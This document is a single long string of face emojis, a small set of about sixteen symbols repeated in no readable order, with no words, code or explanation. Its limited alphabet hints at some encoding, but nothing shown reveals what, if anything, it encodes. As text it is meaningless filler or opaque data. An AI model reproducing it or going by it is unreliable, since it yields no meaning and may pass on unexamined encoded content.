😊😇😉🤣😀🤪🙂😂😂😀🤣🙃😅🤪😆😊😁😆😄😝😃🤣😃🤪😜😂🤪😀😝🙃😇😄😊😊😉😆🙃😝🙂🤣😂😜🤣🙂😅😃😆😉😁😁😄😇😃😅😀😝😜🤣🤪😜😝🙂😇😃😊😉😉😁🙃😇🙂😅😂🤪🤣😂🙂😀😆🙃😁😄😄😊😃😆😀😇😜😅🤪🤪😝😂😇😀😊🙃😉😄🙃😊🙂😆😂😝🤣🤣😅😜😆🙂😅😃😄😉😃😁😀😊😜😆🤪😝😝🤣😇😜😊🙂😊😃🙃😉🙂😁😂😇🤣😅😅🤪😆😂😁😀😄🙃😁😄😀😉😜😁🤪😇😝😅🤪🤪😊😂😉😀🙃🙃🙂🙃😜😊🤣😆😅😝😆🤣😁😜😄🙂😃😃😀🙃😜😇🤣😊😝😆😇😝😊🤣😊😜🙃🙂🙂😃😂😉🤣😁😅😇😆😅😁🤪😁🙂🤪😀😀🙂😜😃🤪🤪😃😆🤣😇😊😅😉🤪🙃😊🤪😂😀😀🙂🙂😉😀😂😉🙂😆😆😝😂😅😅😜😃😆😄😉😃😄😇😊😊😆😉😅😀😇🙃🤣😀😜😉😉😉😁🤪😇😇😅😊🤪😉😂🙃😀🙂😊😂😇😇🙂😃😊😂😁😉😇🙃😅🙂😁😆😝😝🤣😉🤪😂🤣😇😜😂😂🙃😜😜🙃😉😃😂😉😅😄😇🙃😝😄😉😊🙃😆🙂😝😂🤣🤣😂😅😇🙃😅😁🤣🙂😁😃😇😀😆😜😝🤪🤣😝😜😇🙂😊😃😉🤣😜😁🙂😇😂😅🤣🤪😅😂😆😀😁😉🤪🤣😃😂😂😆😄😇🤪😅😝🤪😇😇😊🙂😀🤪🙃😊🤪😊😝😆🤣😝😅🤣😆😅😝😃😝😝😂😊🤣🤣😁🤣😁🙂😃🤪🤣🤣😊😜😉🙂🙃😅😜😀😇😉😉😃🙂😊🙃😅😅🤪🙂🤣😉😜😁🙂😆😉🤣😆🙃😇😇😅😊🤪😉😇😂😂😂😀😊🙂😜😃😊😉😝😁🤣😇😁🤣😅🤪🙃😂🤪😀😇😁😀😇😆😆😊😝😉🤣🙃😆😀🤪😉🤣🙂🤪😜😂😝😃😇😉😉😄😇😝😅😀🙂🙂🤪😃😝😉😇😂🤪😁😄😊😉😅😉😝🙂🤣🙃😀🙃🙂🙃😄😅😉😂😝😆🤣😀🤪😜😂🤪😂😊😀😃😉😄🙂😃😆😜😝🙂🤣😂😜🤣😇🙂😅😉😃😅🙃😁😄🤪😊😅😉🤣😂😆😜😝🙂😇😃😊🤪😜😉😜😄😝😇😅😅😉🤪🙂😜😇🙃😅😄😄😊😃😆😀😃🤪😉🙃🤪😅🙂😁😀😊🙃😉😄🙃😄😇😊🤪😁😊😇😉🤣😄😝😂🙂😄😁😂😁🤣😊😜😆🤪😝😝🙃😉😜😉😜🙂😆😉🙃😇😅😝🙂😝🤣😅🤪😆😂😁😀😄😝🙃🙃😅😃😇🙃😜😁😊😇😊😅😆😝🤪😅😊😀😂🙃🤣😄😉🙃😅😁😅😝😅🤣🤣🤪😅😃😀🙃😜😄🤪😊😝😆😇😝😊😅😉😁🙂😃🤪😜😂😉🤣😁😅😇😆🙃😉😀😅😂😃🙃🤪😁🤣🙃😅😇😉🤣😁😇😅😃😊😂😆😊🤪😆😜😇😂😁😅🙃😁😊😄🤣🙃😇😜😁😀🙂😂😉🤣🤣😁😊😝😄😂😁😝🤪😇😆😁🤣😄😀😜😂🙂🙂🤪😁😁😅🤣😀😉😂😁😇😆😁😄🙃😁😜😃😃😄😇🙃😃😜🙃😀😜🙂😆😊😊😇😇🤪😁😉🤪😝😆😄😉😂😀🤪🤣😊🙂😉😆😁😉😅😜😜🤣🙂😇😅🤪😄🙃😁😜😜😅😉😇🤣😃😜😂😇🤪😉😅😉🤣🤣😃🙃😂😇🙃😄😁😂😅😉😜😜🤣🤪😝😉😜😁😆🤪😊😉🤣🙃😇😂😃😜🙂🤪😜😄😀😉😊😝😄😀😂😊🙃😉😅😄😊😃😇🤣🤣🤪😝😁😁😅😉🙂😜😜😅😜😝😅😄😊😆😉😜😀😅😁😇😆😝😉🙃😀🤪😊😅🙃😊😅😝😂😁😄😝😝😆🙃😅🤪😃🤣😂😅🙂😉😆😃😉😃😀😁😅😜😂🤪😁😆🙂😂😜🙂😅😄😇😃😄😁😁😉🤪😉😅😃😉🙃😀😊🙂😄😝😊😆😅😉🙂😊🤪🤣😁😝😆😄🤪😆🤪😜😂🤣😆😊😊😄😀🙂🤪🤪😊😀😉😇😄😃😉😂😊🙃😉😆😅😊😆😀😜😂😉🙂🤪😁😆😉😅😀🤪😃🤪😝😃😁😆😆😉😀😄😅😉😊😊😝😉😂😜🤪😅😆🙃🤣😉😄😁😁😄🤪😝😁😊😉😇😃🤣😄🤣😝😃😆😀🙃😊😀🤣🤣😝😂🤪😁😃🙃😆😉😉🤣😄😊😉😃😊🙂🙂🙃🤪😆😝😉😜😃🤣😂😉🙃😄😆😉😉😄😀😁😄😄😇🙂😁🙃😉😄😀😅😃🤣😊😊😄😇🙂🤣😉🤣😆😜😉😜😄😅🙂😜🙃😉😆😅😊😆😀😜😂😉🤪😃😁😉😀🙂🙃😃😄😀😉😜😊😁😁😊😇😇😆😇😝😝😂😆😅😜😄😝😊🤣😆😅😝😆😉😆😅😅😜😅😂🙃😀🤪🙃😇😜😀😆😇😝😊🤣😉😜🙃🙂🙂😃😂😉🤪😜😅😅😂😅😆😃😁😂😃😁😆🙃😁😃🤪😉😝😁😇😁😄😊😊😅🤣😝😝😜😜😉😂😄😅😊😆😆😁😄😆😇🤣🤣😀🤪😊😂😂😀😀🙂😝😄😜😉😜😁😝😊😊🤣😊😜😅🙂😂😀😅🙃😉😄😂🙂😁🤪😀🤣😜😜🤪😊😁😉🤪😉😊😁😉😇🙃😅😊🤪😂😂😂😀😅😉🤪😄😁😊🤣😅😁😝😀😅😜🤪🤪🙂😀😀😇🙃😇😄😉😊😝😅😉😝😂🤣🤣😜😅😊😅😃😁😉😁😁😃😇😀😇😂😝🤪🤣🤪😜😇🙂😊😃😉😉🙃😁🙂🤪😂🙂😃🤪😅😂😅😀😁🙃😁😄😃😊😊😁😜🤪😀😅😝🤪😇😂🤪😀😉😉😅😄🙂😊😂😆🤣🤪😂🤣😆😜😁🙂🤣😃😃😉😆😄😜😊🤪😆😝🤪🤪🤣😊😜😉🙂🤪😃🙂😊😀😁🤣😇😅😅😆😜😅😂😄😀😃🙃🤣😃😜😊😅😁😝😇😇😅😊🤪😉😂🙃😀🙂🙃😉😄🤣😊😊😆😆😝😅🤣😄😀😁🙂😀😀😜😉😄😄😝😇🙂😆😊😝😉🤣🙃😀😉🙂😂😃🤣😉😉😁😆😝🙃😅😄🤪😃😂😀😃😃🙂🤪😃😝😊😄😁😊😝😝😅🙃🤪🙂😂😂😃🙂🙃😅😄😆😊😉😆😄😝🤣🤣😀🤪😜😂🤪😀😝🙃😇😄😊😊🤪😆🙃😝😜🤣😂😜🙂🙂😅😄🤣😉😁😁😄😇🤣😅😀😜😀🤣🤪😜😝🙂😇😃😊😉😉😁🙃😇🙃😅😂🤪😊😂😅😀😅🙃😁😁😆🙂😃😆😀😝😀😅🤪🤪😜😂😇😀😊🙃😉😁😊😄😊😆😂😝🙂🤣😅😀🙃🙂😁😃😄😉😃😁😀😊😜😆🤪😝🤪🤣😇😜😝🙂😉😃😉😉🙂😁😂😇🤣😅😅🤪😅😂😁😀😄🙃😃😄😃😉😜🤣🤪😇😝😅😇🤪😇😂😉😃🤪🙃🙂😄😜😊🤣😅😂😝😆🤣😁😜😆🙂😃😄😇🙃😜😄🤪😊😝🤣😇😝😊🤣😉😜😊🙂🙂😃🙃😉🤣😁😜😇😆🤣😅🤪😄😂😃😀😆🙂😜😁😊😉😝😁😇😇😊😅😉🤪🙃😂🙂😀🙃🙃🤣😄🙃😊😆😆😅😝😄🙂😃😜😀😂😜😃😀🙃😝😄🤪😊😊😅😉😝🙃🙂🙂😜😂🙂🤣😃😂😉😆😁😅😇😄🤣🙃🤪😀🙂😜😜🤪🙂😝😃🤪😉😊😁😇😇🙃😅🙃🤪😂🙂🙂😀😅🙃😆😄😂😊😄😅🙂😝😀😅😜🤪🤪😂😝😀😇🙃😊😄😜😊🙃😆🙃😝😂🤣🤣😜😅🙂😆😃😁😉😄😁😅😇😀😅😆😝🤪🤣😝😜😇🙂😊😃😉😉🙃😁😉😇😂😅🤣🤪😅😂😅😀😁😉😆😄😃😊😀😆😃😇🤪🤣😜🤪😇😂😊😀😉🙃🙃😄🙂😊😂😆🙃😝😅🤣😅😜😁🙂😄😃😃😇😀😄😜😊🤪😅😀😝😇🤣🤪😜😉🙃🤣😃🙂😇😂😁🤣😇😅😅😂🤪😁😂😅😀😃😉😆😃😜😇🤪😁😝😇😇😅🤪🤪😉😂😇😀🙂😉🤣😄🤣😇😂😆😆😝😁🤣🤣😜😃🙂😜😀😜🙃🤪😄😝😝😇😆😊😝😉🤣😝😜🙂🙂😊😃🤣😊😁😁😆😝😅😅😄🤪😃😂😅😜😜🙃😆😃😝😉😇😁😊😝😇😅🙃🤪🙂😂😝😀🤣🙃😊😄😆😊😁😆😄🤪😁🤣😀🤪😜🙂😅😀😝😊😅😄😊😊😉😆🙃😝🙂🤣😂😜🤣🙂🙃😃😆😉😉😁😄😇😁😅😀😝😜🤣🤪😜😝🙂😜😃😊😉😝😁🙃😇😇😅😂😜🙂😂😅😀😆🙃😂😄😄😊😆😆😀😇😜😅🤪🤪😝😂😇😀😊🙃😇😄🙃😊😇😆😂😝😂🤣😅😃😉🙂😁😃😄😉😃😁😀😝😀😆🤪😝🤪🤣😇😃🤣🙂😉😃😝😊😉😁😂😇🤣😅😅😜😅😂😁😀😁🙃😃😄😀😆😂😁🤪😇😝😅😇🤪😇😂😉😀🙃🙃🙂😄😂😊🤣😆😅😝😆🤣😆😀😁🙂😃😃😀🙃😜😄🤣😇😂😆😇😝😊🤣😉😁😜😜😃🙂🙃😀😊🙂🙂😄🙃😇😅😅🙂😝🤣😂😄😇😁😄😄😉😝😁😇😇😊😉😝😅😃🤪😂😂😂😄😇😄😊😊😆😆😁😝😄😁😝😅🙂😉😉🙃🙃😁😆😝😀🤪😜😅😁😝🙃🤣🙂😜😂😝🙃😄😃🤣🤣🙃😊😇😆😃😇😆😇🙂🤪😇🙃🙂😅😄😝😉😊😁😉😇🙃😉😉😆😇🤪🤣😂😃😜😝🙂🤣😃😁😊😅😁😅😇😁😆😃😜😃😂😊😀😝🙂😊😄😀😉😝😝😂🤣🤣😅😉🙂😉😃😁😉😄😁😃😁😅😊😝😆🤪😇🤪😅😜😜🤣😆🤪😊😄😁🙂😇😂😅🤣😁😅🤪😀🤣😆😀😊🙂🤣😄😄🙂🤣😆😁😇🤣🤪😆🙂😀😀😉🙃🙃😄🙂😀😁😉😊😁🤣😝🤣🤣😃🙂😅😃🙂😉😀😄😜😊🤪🙃😄😆😉😇😇😅😇😜😅😂😝😀😊😜😇😇😅😅😆🤪😁😂😄😀😃🙃😀😀😜🤪😝😆😀😝😀😅😊🤪😉😂🙃😂😜😜🙂🙂😜😄🙃😝🙃😝😁🤣😄😜😃🙂😀😀😜🙃🤪🙂😄😜😇😆😁🤪😆🤣🙃😜🙂🙂😂😅😝😀😉😉🙂😃🤣😊😂😅😁🤪🤣🤣🙂😜😃🙂😄😆😄😆😁😇😉😅🙃🤪🙂😊😜🤣🙃🤪😂🤣🤪😜😇🙃😊😄🙃😉😊😄😁🙂😄😀😝🙃😇😄😊😄😃😉😉😆😅😇😇🙂😇🙂😊😃😆😉😁😁😄😀🤣😇🤣😆😆😝😇😂😃😜😜😁🙂😉😉😁🙃😇🙂😅😝😃😁😂😅😀😆🙃😁😄😅😊😃😆😃😇😜😅😜🤪😝🙂😀😃😝🙃😉😄🙃😊🙂😆😉😝🤣🤣🤣😜😆🙂😂😄😆😉😃😁😀😊😜🤣😉😝😝🤣😝😜😊🙃😇🤪🙃😉🙂😁🙂😇🤣🤣😃🤪😆😂😁😀😄🙃😃😝😁😉😜😁😜😇😝😅😝🤪😊😂😊😀🙃🙃🙂😄😂😊🤣😆🤣😝😆🤣😁😜😄🙂😄😃😀😊😃😄🤪😊😝😆🤪😝😊😂🙃😜🙃🙂🙂😃😂😊🙂😁😅😇😆😅🤣🤪😄😂😅😀😀🙂😜😃🤪😊😜😁😇😇😊😅🤪🤪🙃😂😊😀😂🙃🤣😄😅😇🤣😆😁😝😄🤣🤣😜😀🙂😇😀🤪🙃😝😄😇😊😊😆😉😝🙃🤣😉😜😂🙂😊😃😅😉🤣😁😁😝😄😅😃🤪😀😂😀😜🤪🙃🙂😃😇😉😝😁😉😝😊😅🙂🤪😂😂🙂😀😅😉😆😄😁😊😄😆😃😜😀😅😜🤪🤪😂😜😀😇🙃😝😄😉😇😂😆🙂🤪🙃🤣🤣😜😅🙂🙂😃😁😉😂😁😃😇😀😆😜😝🤪🤣😝😜😇🙂😝😃😉😉😝😁🙂😇🙃😅🤣😀😅😂😆😀😁🙃😆😄😃😊😄😁😜😝😜😅😝😀😇😂😊😀😉🙃😊😄🙂😊🙃😆🤣😝😂🤣😆😃😁🙂😄😃😃😉😄😄😜😇😀😆😝😝😝🤣😊😀😇🙂🙃😃🙂😉😊😁🤣😇😇😅😆🤪😁😂😄😀😃🙃😀😃😜😊😁😁😝😇😝😅😊🤪😉😂🙃😀🙂🙃😂😄🤣😊🙃😆😆😝🙂🤣😄😜😃🙂😀😀😜🙃🤪😄😝😊🤪😆😊😝😉🤣🙃😜🙃🙂😂😃🤣😉😅😁😆😇😅😅😄🤪😃😂😀😜😜🙂🤪😁😝😉😇😁😊😇😇😅🙃🤪😉😂😂😀🤪🙃😅😆😆😊😁😆😄😝😁🤣😀😜😃😂🤪😃🤣🙃😇😅😊😊😉😆🙃😝😉🤣😂😀😀🙂😅😃😉😉😁😁🤣😇😃😅😀😝😜🤣🤪😜😝🙂😇😃😇😉😉😁🙃🤣😀😅😂🤪🤣😂😅😀😅🙃😁😄😄😊😃😆😀😇😜😅🤪🤪😝😂😝😃😄🙃😉😄🙃😊🙂😀😝😝🤣🤣😅😜😆🙂😁😃😄😉😃😅😀😜😜😅😃🤪😅🤣😇😜😊🙂😉🤣😃😀😊🙂🙃😃😀🙃🤪😁😝😇😊😆😝🙃😆😄🤣😉😜😁🤪😇😝😇😜😅😀🤪🤣🤣🤪😜😊🙃😊😊🙃😆🙃😝😆🤣😁😜😄😇😊😂😀😜😃🙂😀😅😁😅😝😝😊🤣😉😜🙃🤪😜😂😇😃😉😉😁😄😅😇😀😆😂😝😆🤣😃😜😊🙂😉😃😉😉😃😁😜😇😄😅🙂😝😇😇🤪🙃😇😄😅😊😆😆😁😅😝😊😄😊😁😜😊😜😉🙃😅😄😁😊😊😆😉😝🙃🤣🙂😜😂🙂🤣😃😅🤪😆😆🤪😇😄😅😃🤪😀🤣😜😆😝🙂😝😃😝😉😊😁😇😇🙃😅🙂🤪😂😂🤣😀😅🙃😆😄😅😊😄😆😃😝😀😅😜🤪🤪🙂😜😀😇🙃😊😄😝😊🙃😆😊😝😂🤣🤣😜😅🙃🤣😃😁😉😄😁😅😇😀😅🤣😝🤪🤣😝😜😇🙂😊😃😉😉🙃😁😝😇😂😅🤣🤪😅😂😆😀😁🙃😄😄😃😊😀😆😄😇🤪😅😝🤪😇😂😊😀😉🙃🙃😄🙂😊😂😆🙂😝😅🤣😆😜😁🙂😁😃😃😊😄😜😜😊🤪😅😀😝😇😂😀😜😉🙂🙃😃🙂😉😂😅😅😇😅😅😂🤪😁😂😁😀😃🙃😄😃😜😇😀😁😝😇😇😅😜🤪😉😂😊😀🙂🙃😂😄🤣😇😂😆😆😝😁🤣😂😜😃🙂😆😀😜🙃🤪😄😝😇🤪😆😊😝😉🤣😜😜🙂🙂😝😃🤣😉😅😁😆😝😅😅😄🤪😃😂😂😜😜🙂😜😃😝😉😇😁😊😇😉😅🙃🤪🙂😂😊😀🤣🙃😇😄😆😊😅😆😄😝😂🤣😀🤪😜🙂😃😀😝😉😝😄😊😊😊😆🙃😝😇🤣😂😜😉🙃😂😃😆😉😁😁😄😝😄😅😀🤪😀🤣🤪😀😃🙃🤪😃😊😉😉😁🙃😝🤪😅😂🤪😂😂😅😀😆😀😊😄😄😊😆😆😀😇😜😅🤪🤪😝😂😇😃😃🙃😜😄🙃😊🙃😆😂🤪😊🤣😅😜😅🙂😁😃😅😉😃😁😆😝😃😆🤪😝😝🤣😇😃😀🙂😉😃😉😉🙂😁😊😝🙂😅😅🤪😆😂😁😃🙂🙃😃😄😃😉😜😁🤪🤣😅😅😇🤪😊😂😉😀😉🙃🙂😄😂😊🤣😆😅😆😇🤣😁😜😅🙂😃😃😃🙃😜😄🤪😊😝😆😇😊😁🤣😉😜😝🙂🙂😃😂😉🤣😁😅😇😆😅😁😅😇😂😃😀😁🙂😜😃🤪😉😝😁😇😇😊😅😉🤪😀😂🙂😀😉🙃🤣😄😅😊😆😆😁😝😄🤣😃🙂🙂😂😜😀🤪🙃😝😄😝😊😊😆😉😝🙃🤣🙂😜😂🙂🤣😃😅😉😆😁🤣😇😄😅😃🤪😀🤣😂😀😄🙂😝😃😇😉😊😊😃😄😉😇😃😅😊🤣😊😀🤣😅😊😄🙂😊😄😆😃😝😀😇😜😅😃😝🤪😂🙂😀😂😁😆😊🙃😆🙂😝😂🙂😇🙂😂🙂😆😃😁😉😄😁😆😇😀😅😀😝🤪🤣😜😜😇🙂😜😄😇😉🙃😁🙂😇😂😅🙃🤪😅😂😅😀😁🙃🤣😁😁😊😀😁😜😇🤪🤣🤣🤪😇😂😇😀😉😉😊😜🙂😊😂😆😂😝😅🤣😅😜😁🙂😄😃😃😉😀😀😇😊🤪😆🤪😝😇🤣😇😜😉🙂😉😃🙂😊🙃😀🤣😇😅😅😅🤪😁😂😅😀😃🙃😀😃😜😊😀😅😜😇😇😅😝🤪😉😂🙃😀🙂🙃😂😄🤣😊😅😂😉😝😁🤣😁😜😃🙂😄😀😜🙃😜😄😝😇😀😅😝😝😉🤣🙃😜🙂🙂😂😃🤣😉🤣😁😆😇😁🤪😉🤪😃😂😀😜😜🙂😜😃😝😉😇😁😊😇😊😅🙃🤪🙂😂😂😃😄🙃😅😄😆😊😁😝🙂😝🙃🤣😀🤪😜😂🤪😅😅😜😜😂😝😀😆🙃😄😁😃😊😜😆😃😆😇😃🙃😉😁😁😄😇😃😉🤣😆😀😝😉😂😄😜😃😃🤪😊😅😁🙃😇🙂😅😂😁😄🤪😆🤣😂😜😆🙂🤪😀😃😉😇😁😀😝😂😅😄🤪🤪😉😃😉😀😄🙃😊🙂😆😂😃🙂🙂😉😊😆😇😂🤣😜😜😂🙃😅😇🙂😆🤪😝😝🤣😇😆😝😝😂😆😝😊🤪😁😉😉😂😄😃🙃😊😀🙃🤣🤣🙃😃😄😀😉😜😁🤪😇😝😅😇😄😅😊😉😜🤪🙃🙂🤪🤪😊😉😆😅😝😆🤣😁😅🙃🤪😄😂😝😀😆😁😃😇😁😆😇😝😊🤣😉😆😜🤪🙃🙂😁😃😊🙃😉😁😂😊🙂🤪😉😂😃😀😀🙂😜🤣🤣😄😄😉🙃😄😇😇🙂😅🙂🤪😃🤣😊🙂🤪😄😇😊😆😆😁😝😄😊😃😅😇🤪😀🙂😂😀😄🙃🤪😄🤪😉😜🤪😄🤣🙂😜😂🙂🤣😅🙂😀😇🙃😆😁😆😊😄😆😁🤪😁🤣😁😜😜😄😉😉😊😁😉😇🙃🤣😉😆😃😂🤣😀😅🙃😆😄😊😊😄😆😃😝😀😂😜🤪🤪😂😝😀😇🙃😊😄😉😊🙃😅😁😝😂🙂🤣😜😅🙂😆😃😁😉😄😁😃😇😀😅😄😝🤪🙂😝😜😇🙂😊😃😉😉🙃😁🙂😇😂🤣😄🤪😅🙃😆😀😁🙃😄😄😃😊😀😁😜😇🤪🤣😂🤪😇🙃😊😀😉🙃🙃😄🙂😊😂😆🤣😝😅🤣😝😜😁🙃😆😃😃😉😀😁😀😊🤪😆🤪😝😇🤣😊😜😉🙃😊😃🙂😉😂😁🙂😇😅😅🙃🤪😁😂😄😀😃😉😄😃😜😉🤪😆😀😇😇😅😜🤪😉😂🙃😀🙂😉🙃😄🤣😊😅😆🙂😝😁🤣🙂😜😃🙂😀😀😜🙃🤪😄😝😊😇😆😇😝😉🤣😝😜🙂🙂🙃😃🤣😉😅😁😆😇😁😅😄🤪😃😂😀😜😜🙂😜😃😝😝😇😁😊😇😉😅🙃🤪🙂😂🙃😀🤣🙃😇😄😆😊😁😆😄😝😃🤣😀🤪😜😂😜😀😝🙃😇😄😊😊😉😆🙃😝🙂🤣😂😜🤣🙂🤣😃😅😉😁😁😄😇😃🙂😆🤪😆🤣🤪😜😝🙂😇🙂😊😃😇😉😄😁🤣😇😊🤪😉😂😅😀😆🙃😁😁😆🙂😃😆😀😇😜😅🤪🤪🤪😂😇😀😊🙃😉😄🙃😁😀😆😂😝😂🤣😅😜😆🙂😁😃😄😉😃😁😀😜😅😆🤪😝😝🤣😇😜😝🙂😉😃😉😉🙂😁😂😅🤪😅😅🤪😆😂😁😀😁🙃😃😄😀😉😜😁🤪😇😝😅😇🤪😊😂😉😃😀🙃🙂😄😂😊🤣😂🙃😝🙂🤣😁😜😄🙂😃😂😂😀😀🙃😊😄😄🤪😄🤪🤣🤣😉😜🙃🙂🙂🙂😅😀😊😉😇😄😂😊🤣😆🤪🤪😀😂😁😀😆🙃😀😃😄😁😜😝😅😅😉🤪🙃😂🙂🤣😅😇😃😄😇😂😊🤪😁😁😂🙃😃🤪😊😅😄😉🤪🙃😆😄😇😊😊😆😉😝🙃🤣🙂😂😂😇😜😅😅🙃😇😁🙃😇😄😅😃🤪😀😝😆🤣😊🤣😃😁😆😝😜😆😀😅😜🤣😀🤪😂😂🤣😀😅😝😇🙂🤣😀😆🙂😊😃🙃😊🙂😆🤣😇🙂😝😁😉🙃😄😉😊🙃😆🙂😁😜😝😅🤣😆🤪😜🙂😀😀😂😉😅😄😃😊😇😆😁🤪😃🤣😆😜😉😂🤪😊🙃😁🙂😇😂😅🤣😜😂😂😅😀😁🙃😆😄😃😊😂😁😜😇🤪😅😝😜🤪😂😊😀😉🙃😇😄🙂😊🙂😆🤣😝😅🤣😆😀😅🙂😄😃😃😉😆😄😜😇😆😆😝😝😇🤣😊😀😇🙂🙃😃🙂😉😇😁🤣😇🙂😅😆🤪😁😂😄😃😁🙃😀😃😜😊😆😁😝😝😃😅😊🤪😉😂🙃😃😉🙃😂😄🤣😊😇😆😆😝😂🤣😄😜😃🙂😀😀😜🙃🤪😄😝😇😀😆😊🤪😃🤣🙃😜😉🙂😂😄🙂😉😅😁😆😇🙂😅😄🤪😁😂😀😜😜🙂🤪😄😁😜🙂😁😊😝😀😅🙃🤪🙂😂😂😀😂🙃😅😄😂😊😁😆😄😄🙃🤣😀🤪😜😂🤪😀😝🙃😇😄😊😊😉😆🙃😂😅🤣😂😜🤣🙂😅😃😆😉😁😁😄😇😃😅😀😂😇🤣🤪😜😝🙂😇😃😇😉😉😁🙃😇🙂😅😂🙃😂😂😅😀🙃🙃😁😄🙂😊😃😆😀😇😜😅🤪😆😇😂😇😀😝🙃😉😄🙃😊🙂😆🙃😝🤣🤣😅😆😆🙂😁😃😁😉😃😁😄😊😜😆🤪😝😝🤣😇🙃😁🙂😉😃🙃😉🙂😁🙂😇🤣😅😅🤪😆😂😆😀😄🙃😃😄😀😊🙃😁🤪😇😝😅😇🙂😃🙂😄😀🙃🙃🙂😄😂😜🤪😉🙂😄🤣😉😝😁😊😝😉🤣🙂🤪😉🤣😃😊😝😆😇😝😊🤣😉😜🙃🙂🙂😃😂🤪🤣😇😊😇😉😅😁🤪😄😂😃😆😁😉😂😉😁😃🙂😜😀😜😊😄😃😜😉😂🙂😀😂🙃🤣🙂😇😃🙃😊😂😆😀😇😄😅😝🤪😆😂😃😜🤪🙃🙂😄😂😊😂😁🤪😝😇😅😜😜😅😂🙃🤣😉😁😁😇😄😅😃🤪😀🤣😜😊🤪😝🤪😅😇😝😜😆😀😇🙃😅🙂🤪😂🤪😊😂😁😀😆🙂😆😃😅😉😇😀😁😅😜🤪🤪😂😝😀😇🙃😊😄😉😉🙃🙂😂🙃🤪😂😀😜😅🙂😆😃😁🤪🙂🙃😉😁😄😊😆😁😃😝😄🤣🤪😀😃😂😜😃😊🙃😝😝😃😅🤣🤪😅😂😆😆🙂😊😁😀😆😁😜😂😅😇😜😄😆😂😀😉😂😜😇😜🤪😄😇😊😂😆🤣😝😅😝😄😅🙂😜😉🙂😅😇🤣😄😜😊🤪😆😝😝😇😀🤪😜😉🙂😊😃🙂😉😂😁🤣😇😅😅😆🤪😁😆😉😀😃🙃😁😃😜😉🤪😁😝😇😇😅😊🤪😉😃😂😀🙂🙃🙃😄🤣😊😅😆😆😝😆🤣😄😀😁😅😀😀😜😉😃😄😝😇😀😆😊😝😉🤣🙃😜🙂😃🙂😃🤣😉🙂😁😆😇😆😅😄🤪😁😂😀😃😃🙂🤪😃😝😊😀😁😊😇😊😅🙃🤪🙂😂😂😃🙂🙃😅😄😆😊🙂😆😄😝😉🤣😀🤪😜😂🤪😃😜🙃😇😄😊😇😀😆🙃😝😊🤣😂😜🤣🙂😅😄🤣😉😁😁😄😇🙂😅😀🤪😆🤣🤪😜😝🙂😇😃😊😉😉😁🙃😇😇😅😂🤪😝😂😅😀🤣🙃😁😄🙂😊😃😆😀😝😄😅🤪😀😝😂😇😀😇🙃😉😄😝😊🙂😆😊🤪🙂🤣😅😜😆🙂😁😁😄😉😃😁😃😊😜🤣😀😉😝🤣😇😜😜🙂😉😄😁😉🙂😁😂😇🤣😅😅😅😇😂😁😀😂🙃😃😄😀😉😜😁🤪😇😝😅😇😉🙃😂😉😀😜🙃🙂😄😝😊🤣😆😅😝😆🤣😂😀😆🙂😃😃😀🙃😜😆😇😊😝😆😝😝😊🤣😉😂😃🙂🙂😄😀😉🤣😁🤣😇😆😅😁🤪😄😂😂😇😂🙂😜😄😂😉😝😅😉😇😊😅😊🤪🙃😂🙂😀😂🙃😉😁😂😊😆😆😁😝😄😂😜😜😀🙂😀😀🤪😊😝😃😊😊😊😅😁😝🙃🤣😉😜😂🙂😝😃😅😉😉😃🤪😇😄😅😉🤪😀🙂😝😜🤪🙂🤪😃😇😊😄😁😉😇😝🤣😉🤪😂😂🤣😀😅😊😄😄😁😊😁😆😃🤪😀😀😀🤪🤪😂😜😀😇🙃😝😄😉😇😃😆🙂😜😂😆🙃😜😅🙂😝😃😁😉😄😁😃😇🙂😆😜😝🤪🤣😝😜😇🙃😅😃😉😉🙃😁🙂😇😂😅🤣😜😂😂😆😀😁🙃😝😄😃😊🤣😁😜😇🤪😅😝🤪😇😂😊😀😉😉😅😄🙂😊🙃😆🤣😝😅🤣😆😜😁🙂😄😃😃😉😊😄😜😇😉😆😝😝😇🤣😊😜😉🙂🙃😃🙂😊😀😁🤣😇😅😅😆🤪😁😂😄😀😃🙃😀😃😜😊😂😁😝😇😇😅😊🤪😉😂🙃😀🤪😆😝😄🤣😊🙃😆😆🤪😁🤣😄😜😄🙂😀😃😃🙃🤪😁😃😇🤪😆😊😝😉🤣🙃😀🙂🙂😂😃😂😉😅😁😆😁😊😅😄🤪😅😂😀😀😃🙂🤪😃😝😉😇😁😊😄🤪😅🙃🤪😝😂😂😀🤣🙃😅😄😆😊😁😆😄😝😃🤣😀😜😅😂🤪😀😝🙃😇😄😊😊😉😆🙃😝🙂🤣😂😜😉🙂😅😃😆😉😁😁😄😇😃😅😀😝😜🤣🤪😀😃🙂😇😃😊😉😉😁🙃😇🙂😅😂🤪🤣😂😅😀😆🙃😁😄😁😊😃😆😀😇😜😅🤪🤪😝😂😇😀😊🙃😊😄😉😊🙃😆😂😝🤣🤣😅🙂😉🙂🙂😃😄😉😃😁😀😄😜😊😃😁🤪😝🙂🤣😂🙃😀😃🙃😉🙂😁😂😝🙂😄😅🤪😆😂😆😀😄🙃😄😄😀😉😜😁🤪😝😁😉🙂🤪😊😂😇😀🙃🙃🙂😄😂😊😂😆😅😝🤣🤣😁😜😄😝🙃😃😀🙃😜😄🤪😊😝😆😇😝😊🤣😉😜🙃😄😅😃😂😉🤣😁😅😇😆😅😁🤪😄😂😃😀😀😇😅😃🤪😉🤪😁😇😇😝😅😉🤪😉😂🙂😀😂😄🤪😄😅😊😆😆😁😝😁🤣😃😜😀😂😜😀😜🙃😝😄😇😊😊🙂🤣😝🙃🤣🙂😜😂😊🙃😃😅😉😆😁😁😇😄😅😃🤪😀🤣😜😁🤪🙂😆😃😇😉😊😁😉😇🙃😅🙂🤪😂🙃🤣😆😅😜🙃😄🙃😊😄😆😃😝😀🤣😝😊😊😆😅🤪🤪😇🤪😂😅😊😃😆🤪😝😂🤣🤣😜😅😆🙃😃😄😆😜😉😁😇🙂😝🤪😆😁😂😊😜😇🙂😊😃😉😜😅🙃😁😀🤪🙂😜😀😇😂🙃😀😄😅😆😜😝😂😄😜😆🤣😅🤪🤣😅😊😆😄😀🤪🙃🙃😄🙂😊😂😉😇😁🤪😝😄😅😂🤪😅😂🤣😉😁😄😜😊🤪😆😝😄🤣😝😉😅😇😅😀😄😆😉😂😁🤣😇😅🙃😝😅😃🤪🙂😂😀😜😊🙂😆😀😃😉😄😁🤪😝😃😆😜🤪😊😇🤪🙃😂😄🤣😊😅😆😆😝😁🤣😄😁😆😇😀😆😁😉🤣😄😝😊😇😆😊😄😄😝🤪🤣😅🤪🙂🙂😆😃😆🙃😝😄😂😊😂🤪😅😂😀😜😜🙂🤪🙂😆😀😝😉🙂😄😜😄😀😜😀😂😂😀🤣🙃😅